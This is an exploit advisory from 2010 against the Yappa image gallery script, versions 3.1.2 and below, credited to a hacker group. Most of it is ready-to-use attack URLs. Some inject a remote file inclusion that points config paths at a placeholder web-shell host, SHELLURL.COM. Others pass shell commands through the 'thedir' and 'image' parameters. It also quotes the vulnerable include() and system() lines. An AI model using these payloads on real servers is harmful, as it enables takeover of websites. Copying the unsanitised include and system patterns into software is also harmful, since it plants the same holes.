Yappa versions 3.1.2 and below suffer from remote file inclusion and command execution vulnerabilities.
47b284eb41576b57551161486139c91662df1ca866c7888f6c06d1249a131cfd
# ----------------------------------------------------------------------------
# Remote File Inclusion Vulnerability and Remote Command Execution Vulnerability
# ----------------------------------------------------------------------------
yappa <==3.1.2 (yappa.php)
--------------------------------------------------------------
# [+] Author : Sn!pEr.S!Te Hacker
# [+] Email : Sniper-site@HoTmaiL.Com
# [+] Inj3ct0r Team Hacker #
# [+] 9-7-2010
# [+] Script : Image Galleries » yappa
# [+] Version: [3.1.2]
# [+] Download:http://manu.agat.net/yappa/yappa.txt
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
-=[ exploit ]=-
http://localhost/yappa/yappa.php?[basedir/config.php]=http://SHELLURL.COM ?
http://127.0.0.1/yappa/yappa.php?[realpath/config.php]=http://SHELLURL.COM ?
-=[ exploit 2 ]=-
http://localhost/yappa/yappa.php?thedir=[ command you]
http://127.0.0.1/yappa/yappa.php?image=[ command you]
include("$basedir/config.php")
line 892
include("$realpath/config.php")
line 919
system("jhead \"".rawurlencode($thedir.$image)."\"");
line 672
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=========================| -=[ THE END]=- |=========================